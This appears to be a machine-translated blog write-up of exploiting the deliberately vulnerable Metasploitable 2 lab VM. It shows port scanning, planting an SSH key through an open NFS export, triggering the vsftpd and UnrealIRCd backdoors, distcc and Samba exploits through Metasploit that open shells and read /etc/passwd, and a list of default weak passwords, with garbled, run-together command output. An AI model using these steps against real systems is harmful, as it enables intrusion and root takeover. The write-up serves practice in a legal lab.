Download
metasploitable 22 Download Locations
- Https://information.rapid7.com/metasploitable-download.html
- https://sourceforge.net/projects/metasploitable/
0x01getting Started
Username:msfadmin
Password:msfadmin
Use ifconfig to view IP addresses and get IP 192.168.111.146
about Kali I use the Kali in Win10, Ineed to install a lot of tools and libraries, I hope to do this write test can let my winkali have a complete tool system
0x02services
When using the subsystem, NMAP is not working properly, the query and subsystem using sockets, to solve the problem can use the subsystem to play again
The following results are the result of the Kali virtual machine
Using Nmap for scanning
[email protected]:~# nmap-p0-65535 192.168.111.146Starting nmap 7.70 (https://nmap.org) at 2018-07-18 12:59 Cstnma P Scan Report for Bogon (192.168.111.146) Host was up (0.00013s latency). Not shown:65506 closed Portsport State service21/tcp open ftp22/tcp open ssh23/tcp open telnet25/tcp Open smtp53/tcp Open domain80/tcp open http111/tcp open rpcbind139/tcp open netbios-ssn445/tcp open MICR OSOFT-DS512/TCP Open exec513/tcp Open login514/tcp open shell1099/tcp open rmiregistry1524/tcp open Ingresloc K2049/TCP Open nfs2121/tcp Open ccproxy-ftp3306/tcp open mysql3632/tcp open distccd5432/tcp open postgresql5900/ TCP Open VNC6000/TCP Open x116667/tcp open irc6697/tcp open ircs-u8009/tcp open ajp138180/tcp open unknown8787 /TCP Open msgsrvr34609/tcp Open unknown35752/tcp open unknown39086/tcp open unknown48560/tcp open Unknownmac Address : 00:0c:29:5a:c7:d5 (VMware) Nmap done:1 IP address (1 host up) scanned in2.37 seconds
0x03unix Basics
TCP ports 512,513 and 514 are called "R" services and have been incorrectly configured to allow remote access from any host (the standard ". Rhosts + +" condition). To take advantage of this feature, make sure that the "rsh-client" client (on Ubuntu) is installed and run the following command as the local root user. If you are prompted to enter an SSH key, the Rsh-client tool is not installed and Ubuntu uses SSH by default.
(Why I can't connect with root, angry)
It's simple. The next service we should focus on is the network File System (NFS). NFS can be identified by directly probing port 2049 or by asking the port mapper for a list of services. The following example Rpcinfo identifies NFS and SHOWMOUNT-E determines that the "/" Share is being exported (the root directory of the file system). You need to follow the Rpcbind and Nfs-common ubuntu packages.
Need to install Rpcbind and Nfs-common
[email protected]:~# rpcinfo-p 192.168.111.146 program vers proto Port service 100000 2 TCP 111 Portmapper 100000 2 UDP 111 portmapper 100024 1 UDP 52576 status 100024 1 TCP 34609 Status 100003 2 UDP 2049 NFS 100003 3 UDP 2049 NFS 100003 4 UDP 2049 NFS 100021 1 UDP 41332 nlockmgr 100021 3 udp 41332 nlockmgr 100021 4 udp 41332 nlockmgr 100003 2 TCP 2049 NFS 100003 3 TCP 2049 NFS 100003 4 TCP 2049 NFS 100021 1 TCP 39086 nlockmgr 1000 3 TCP 39086 nlockmgr 100021 4 tcp 39086 nlockmgr 100005 1 udp 56322 mountd 100005 1 TCP 48560 mountd 100005 2 udp 56322 mountd 100005 2 tcp 48560 mountd 100005 3 UDP 56322 mo UNTD 100005 3 tcp 48560 mountd[email protected]:~# showmount-e 192.168.111.146Export list for 192.168.111. 146:/*
Using a writable file system like this to access the system is trivial. To do this (and because SSH is running), we will generate a new SSH key on the attack system, mount the NFS export, and add our key to the Authorized_keys file of the root user account:
= = This test did not succeed, leave the official steps, and then do research = =
[email protected]:~# ssh-keygenGenerating public/private rsa key pair.Enter file in which to save the key (/root/.ssh/id_rsa):Enter passphrase (empty for no passphrase):Enter same passphrase again:Your identification has been saved in /root/.ssh/id_rsa.Your public key has been saved in /root/.ssh/id_rsa.pub.[email protected]:~# mkdir /tmp/r00t[email protected]:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/[email protected]:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys[email protected]:~# umount /tmp/r00t[email protected]:~# ssh [email protected]Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686[email protected]:~#
0x04backdoors
On port 21, Metasploitable2 runs VSFTPD, a popular FTP server. This particular version contains a backdoor that is inserted into the source code by an unknown intruder. The backdoor is quickly identified and deleted, but not before many people download it. If the sent user name ends with a sequence:) [Happy face], the backdoor version will open the Listen shell on port 6200. We can use the Telnet demo or use the Metasploit Framework module to automatically take advantage of it:
#自己做的步骤太乱只有用官方的了。好神奇[email protected]:~# telnet 192.168.99.131 21Trying 192.168.99.131...Connected to 192.168.99.131.Escape character is ‘^]‘.220 (vsFTPd 2.3.4)user backdoored:)331 Please specify the password.pass invalid^]telnet> quitConnection closed.[email protected]:~# telnet 192.168.99.131 6200Trying 192.168.99.131...Connected to 192.168.99.131.Escape character is ‘^]‘.id;uid=0(root) gid=0(root)
On port 6667, Metasploitable2 runs the unreaircd IRC daemon. This version contains a backdoor that has not been noticed for months-triggering by sending the letter "AB" to the system command on any listening port. Metasploit has a module that you can use to get an interactive shell, as shown below.
cve-2010-2075
[email protected]:~# service PostgreSQL start[email protected]:~# msfconsole # cowsay++ ____________< Metasploit >------------\, __, \ (OO) ____ (__) ) || --|| * =[Metasploit V4.16.57-dev]+----=[1769 exploits-1007 auxiliary-307 post]+- ---=[537 payloads-41 encoders-10 nops]+----=[free Metasploit Pro Trial:http://r-7.co/trymsp]msf ; Use Exploit/unix/irc/unreal_ircd_3281_backdoor MSF exploit (Unix/irc/unreal_ircd_3281_backdoor) > Set RHOST 192.168.111.146RHOST = 192.168.111.146msf Exploit (Unix/irc/unreal_ircd_3281_backdoor) > exploit[*] Started Reverse TCP Double handler on 192.168.111.144:4444 [*] 192.168.111.146:6667-connected to 192.168.111.146:6667 ... : IRC. Metasploitable.lan NOTICE AUTH:* * * Looking up your hostname ... [*] 192.168.111.146:6667-sending Backdoor command ... [*] Accepted the first Client Connection ... [*] Accepted The second client connection ... [*] Command:echo P7qlbshau0cggxky; [*] Writing to sockets a[*] Writing to sockets b[*] Reading from sockets ... [*] Reading from Socket a[*] A: "p7qlbshau0cggxky\r\n" [*] Matching ... [*] B is input...iduid=0 (root) gid=0 (root)
Not so subtle is the old backup "Ingreslock" backdoor listening on port 1524. Ten years ago, the Ingreslock port was a popular option to add a backdoor to an infected server. It's easy to access it:
It's scary, direct root user !!!!!
0x05unintentional backdoors
In addition to the malicious backdoor in the previous section, some services are essentially backdoor. The first one installed on the Metasploitable2 is DISTCCD. The program can easily extend large compiler jobs in a server farm that resembles a configured system. The problem with this service is that attackers can easily misuse it to run the commands they choose, as shown in the following Metasploit module.
[email protected]:~# msfconsole%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Percent%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% https://metasploit . com%%%%%%%%%%%%%%%%%%%%%%%%%% percent%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%%%%% %% %% % %% %% %%%%% % %%%% %% % %%%%% %%%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%%%%% %%%%%% %% %%%%%% %%% % %%% %%%% %% %% %%% %%% %% %% %%%%%%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% =[Metasploit V4.16.57-dev ]+----=[1767 exploits-1007 auxiliary-307 post]+----=[537 payloads-41 encoders-10 Nops ]+----=[free Metasploit Pro trial:http://r-7.co/trymsp]msf > Use exploit/unix/misc/distcc_exec MSF Exploit ( UNIX/MISC/DISTCC_EXEC) > Set RHOST 192.168.111.146RHOST = 192.168.111.146msf Exploit (unix/misc/distcc_exec) > exploit[*] Started reverse TCP double handler on 192.168.111.144:4444 [*] Accepted the first client connection ... [*] Accepted The second client connection ... [*] Command:echo Rakautnjekolfqat; [*] Writing to sockets a[*] Writing to sockets b[*] Reading from sockets ... [*] REading from Socket b[*] B: "rakautnjekolfqat\r\n" [*] Matching ... [*] A is input ... [*] Command Shell Session 1 opened (192.168.111.144:4444-192.168.111.146:46058) at 2018-07-18 14:11:34 +0800whoamidaemo Niduid=1 (daemon) gid=1 (daemon) groups=1 (daemon)
This writing test makes me feel the world is more and more unsafe, this is 10 years ago Ah!
Samba configures writable file sharing and enables wide links (which is turned on by default), or it can be used as a backdoor to access files that should not be shared. The following example uses the Metasploit module to provide access to the root file system using anonymous connections and writable shares.
Smbclient-l//192.168.111.146[*] exec:smbclient-l//192.168.111.146warning:the "syslog" option is deprecatedenter work Group\root ' s password:anonymous login successful Sharename Type Comment------------------- -print$ disk Printer Drivers tmp disk OH noes! Opt Disk ipc$ IPC IPC Service (metasploitable server (Samba 3.0.20-debian)) ADMIN $ IPC IPC Service (metasploitable server (Samba 3.0.20-debian)) reconnecting with SMB1 for workgroup listing . Anonymous Login Successful Server Comment----------------Workgroup Master ----------------WORKGROUP metasploitable MSF > Use auxiliary/admin/smb/samba_symlink_t Raversal MSF Auxiliary (admin/smb/samba_symlink_traversal) > Set RHOST 192.168.111.146RHOST = 192.168.111.146MSF Auxiliary (admin/smb/samba_symlink_traversal) > Set SmbshaRE Tmpsmbshare = tmpmsf Auxiliary (admin/smb/samba_symlink_traversal) > exploit[*] 192.168.111.146:445- Connecting to the server ... [*] 192.168.111.146:445-trying to mount writeable share ' tmp ' ... [*] 192.168.111.146:445-trying to link ' rootfs ' to the root filesystem ... [*] 192.168.111.146:445-now access the following share to browse the root filesystem:[*] 192.168.111.146:445-\\192.1 68.111.146\TMP\ROOTFS[*] Auxiliary Module Execution COMPLETEDMSF Auxiliary (admin/smb/samba_symlink_traversal) > Smbclient//192.168.111.146/tmp[*] exec:smbclient//192.168.111.146/tmpwarning:the "syslog" option is DeprecatedEnter Workgroup\root ' s password:anonymous login Successfultry "Help" to get a list of possible COMMANDS.SMB: \> SMB: \> C Dcurrent directory is SMB: \> CD ROOTFSSMB: \rootfs\> ls. DR 0 Mon May 21 02:36:12 2012.. DR 0 Mon 02:36:12 initrd DR 0 Wed Mar 06:57:40 media DR 0 Wed Mar 06:55:52 Dr 0 Mon May 11:35:33 lost+found DR 0 Wed Mar 06:55:15 mnt DR 0 Thu Apr 04:16:56 sbin DR 0 Mon 09:54:53 initrd.img R 7929183 Mon May 14 11:35:56 2012 Home Dr 0 Fri Apr 14:16:02 lib DR 0 Mon may 11:35:22 usr DR 0 Wed Apr 12:06:37 proc Dr 0 Wed 11:34:58 2018 root DR 0 Wed Jul 18 11:37:15 20 SYS Dr 0 Wed Jul 11:34:59 2018 Boot DR 0 Mon May 14 11:36:28Nohup.out R 7984 Wed Jul 11:37:17 2018 etc DR 0 Wed 14:10:42 2018 Dev DR 0 Wed Jul 11:35:53 2018 Vmlinuz R 1987288 Fri Apr 00:55:41 opt DR 0 Wed Mar 17 06:57 : Var Dr 0 Mon 05:30:19 CDROM Dr 0 Wed Mar 06:55:51 tmp D 0 Wed Jul 14:16:29 2018 SRV DR 0 Wed Mar 06:57:38 7282168 blocks of size 1024. 5428700 blocks AVAILABLESMB: \rootfs\> CD ETCSMB: \rootfs\etc\> more passwdgetting file \rootfs\etc\passwd of size 1 624 AS/TMP/SMBMORE.OZUICN (528.6 kilobytes/sec) (average 528.6 kilobytes/sec) root:x:0:0:root:/root:/bin/bashdaemon:x : 1:1:DAEMON:/USR/SBIN:/BIN/SHBIN:X:2:2:BIN:/BIN:/BIN/SHsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12: man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/ Var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x : 33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:mailing List Manager:/var /list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:gnats bug-reporting System (admin):/var/lib/ Gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shdhcp:x : 101:102::/nonexistent:/bin/falsesyslog:x:102:103::/home/syslog:/bin/falseklog:x:103:104::/home/klog:/bin/ Falsesshd:x:104:65534::/var/run/sshd:/usr/sbin/nologinmsfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/ bashbind:x:105:113::/var/cache/bind:/bin/falsepostfix:x:106:115::/var/spool/postfix:/bin/falseftp:x:107:65534: :/home/ftp:/bin/falsepOstgres:x:108:117:postgresql administrator,,,:/var/lib/postgresql:/bin/bashmysql:x:109:118:mysql Server,,,:/var/ Lib/mysql:/bin/falsetomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/falsedistccd:x:111:65534::/:/bin/falseuser : X:1001:1001:just a user,111,,:/home/user:/bin/bashservice:x:1002:1002:,,,:/home/service:/bin/bashtelnetd:x : 112:120::/nonexistent:/bin/falseproftpd:x:113:65534::/var/run/proftpd:/bin/falsestatd:x:114:65534::/var/lib/ nfs:/bin/falsesnmp:x:115:65534::/var/lib/snmp:/bin/false# Surprise!!!
0x06weak passwords
In addition to the more obvious backdoor and misconfiguration, Metasploitable 2 also provides a terrible password security for the system and database server accounts. The primary administrative user Msfadmin has a password that matches the user name. You can use brute force attacks to quickly access multiple user accounts by discovering a list of users on this system, by using another flaw to capture passwd files, or by enumerating these user IDs through samba. At least the following weak system accounts are configured on the system.
User |
Password |
Msfadmin |
Msfadmin |
User |
User |
Postgres |
Postgres |
Sys |
Batman |
Klog |
123456789 |
Servic |
Service |
In addition to these system-level accounts, you can access the PostgreSQL service Postgres with the user name Postgres and password, and root uses a blank password to open the MySQL service username. The VNC service uses a password to provide Remote Desktop access to password.
0x07vulnerable Web Services
Metasploitable 2 pre-installed intentionally vulnerable web applications. Boot metasploitable 2 o'clock, the Web server starts automatically. To access the Web application, open a Web browser and enter the URL/HTTP//
Steal a picture
There is a point of knowledge:
192.168.56/24 is the default "host only" network in virtual box. The IP address is assigned starting from "101". Depending on the boot order of the guest operating system, the IP address of metasploitable 2 will vary.
To access a specific Web application, click one of the links provided. By appending the application directory name to HTTP//
- TWIKI
- PhpMyAdmin
- Mutilidae
- DVWA
- WebDAV
0x08mutillidae
The Mutillidae Web application (nowasp (Mutillidae)) contains all the vulnerabilities from owasp Top Ten and a number of other vulnerabilities, such as HTML-5 Web Storage, form caching, and click Control. Inspired by DVWA, Mutillidae allows users to change the "security level" from 0 (completely unsafe) to 5 (secure). In addition, there are three levels of hints, ranging from "level 0-I try harder" (no hint) to "Level 2-noob" (maximum hint). If the application is corrupted by user injection and hacking, clicking the Reset Database button resets the application to its original state.
This application contains a lot of holes, enough for everyone to learn ...
Learning makes me happy!!!
0x09dvwa
From DVWA homepage: "The Damned Vulnerable Web application (DVWA) is a vulnerable Php/mysql Web application. Its primary goal is to help security professionals test their skills and tools in a legal environment, to help Web developers better understand the process of securing Web applications, and to help teachers/students teach/learn about Web application security in a classroom environment. “
This environment can be built on its own.
User:admin
Pass:password
0x09information Disclosure
In addition, you can find an unwise PHP Information disclosure page in the following location http://
Reference documents
English is not good mainly by Google
Metasploitable 2 exploitability Guide Official documentation
About the metasploitable test